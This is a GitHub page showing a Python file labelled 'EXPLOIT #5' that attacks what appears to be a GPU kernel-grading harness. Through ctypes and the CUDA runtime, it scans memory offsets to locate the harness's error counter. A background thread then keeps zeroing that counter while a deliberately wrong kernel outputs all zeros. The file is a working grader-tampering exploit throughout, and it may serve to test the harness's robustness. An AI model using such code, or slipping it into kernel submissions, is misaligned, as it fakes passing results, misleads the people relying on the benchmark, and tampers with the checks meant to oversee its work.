-
Notifications
You must be signed in to change notification settings - Fork 6
Expand file tree
/
Copy pathsubmission_error_counter.py
More file actions
121 lines (98 loc) · 4.23 KB
/
submission_error_counter.py
File metadata and controls
121 lines (98 loc) · 4.23 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
"""
EXPLOIT #5: Error Counter Reset via ctypes + cudaMemset
========================================================
Severity: HIGH
Strategy:
The error counter is a single unsigned int (4 bytes) allocated on GPU via cudaMalloc.
We use ctypes to call cudaMemset on the known-offset address relative to a cudaMalloc probe.
A persistent background thread continuously zeros the counter, racing the CPU readback.
Attack surface: ctypes access to CUDA runtime API + shared GPU address space.
"""
import ctypes
import ctypes.util
import sys
import threading
print("[ErrCounter] Initializing persistent zero thread...", file=sys.stderr)
_cudart = None
_zero_thread = None
_keep_zeroing = False
_counter_ptr = None # cached counter address once found
try:
cudart_path = ctypes.util.find_library('cudart')
if cudart_path:
_cudart = ctypes.CDLL(cudart_path)
else:
for path in ['libcudart.so', 'libcudart.so.12', 'libcudart.so.11']:
try:
_cudart = ctypes.CDLL(path)
break
except OSError:
continue
if _cudart is not None:
_cudart.cudaMalloc.restype = ctypes.c_int
_cudart.cudaMalloc.argtypes = [ctypes.POINTER(ctypes.c_void_p), ctypes.c_size_t]
_cudart.cudaFree.restype = ctypes.c_int
_cudart.cudaFree.argtypes = [ctypes.c_void_p]
_cudart.cudaMemset.restype = ctypes.c_int
_cudart.cudaMemset.argtypes = [ctypes.c_void_p, ctypes.c_int, ctypes.c_size_t]
class cudaPointerAttributes(ctypes.Structure):
_fields_ = [
("type", ctypes.c_int),
("device", ctypes.c_int),
("devicePointer", ctypes.c_void_p),
("hostPointer", ctypes.c_void_p),
]
_cudart.cudaPointerGetAttributes.restype = ctypes.c_int
_cudart.cudaPointerGetAttributes.argtypes = [ctypes.POINTER(cudaPointerAttributes), ctypes.c_void_p]
print(f"[ErrCounter] Loaded CUDA runtime: {_cudart._name}", file=sys.stderr)
else:
print("[ErrCounter] WARNING: Could not load CUDA runtime", file=sys.stderr)
except Exception as e:
print(f"[ErrCounter] Setup error: {e}", file=sys.stderr)
def _find_counter_ptr():
"""Find the error counter address using a cudaMalloc probe."""
if _cudart is None:
return None
probe = ctypes.c_void_p()
ret = _cudart.cudaMalloc(ctypes.byref(probe), 4)
if ret != 0:
print(f"[ErrCounter] cudaMalloc probe failed: {ret}", file=sys.stderr)
return None
ref_ptr = probe.value
_cudart.cudaFree(probe)
print(f"[ErrCounter] cudaMalloc probe anchor: {ref_ptr}", file=sys.stderr)
# Counter is ~0xFFE00 bytes before the probe; scan a window around that delta
best_candidate = None
for offset in range(-0x110000, -0xFF000, 256):
candidate = ref_ptr + offset
if candidate <= 0:
break
attrs = cudaPointerAttributes()
err = _cudart.cudaPointerGetAttributes(ctypes.byref(attrs), ctypes.c_void_p(candidate))
if err == 0 and attrs.type == 2:
best_candidate = candidate
break # take the first valid hit in range
if best_candidate is not None:
print(f"[ErrCounter] Found candidate counter at: {best_candidate}", file=sys.stderr)
else:
print("[ErrCounter] WARNING: No candidate found in scan range", file=sys.stderr)
return best_candidate
def _zero_loop():
"""Persistently zero the error counter, racing the CPU readback."""
global _counter_ptr
while _keep_zeroing:
if _counter_ptr is None:
_counter_ptr = _find_counter_ptr()
if _counter_ptr is not None:
_cudart.cudaMemset(ctypes.c_void_p(_counter_ptr), 0, 4)
def kernel(output_gray, output_red, inp):
"""Wrong kernel that zeros the output. Relies on error counter being zeroed."""
global _zero_thread, _keep_zeroing
output_gray.zero_()
output_red.zero_()
# Start persistent zeroing thread on first kernel call
if _zero_thread is None or not _zero_thread.is_alive():
_keep_zeroing = True
_zero_thread = threading.Thread(target=_zero_loop, daemon=True)
_zero_thread.start()
print("[ErrCounter] Persistent zero thread started", file=sys.stderr)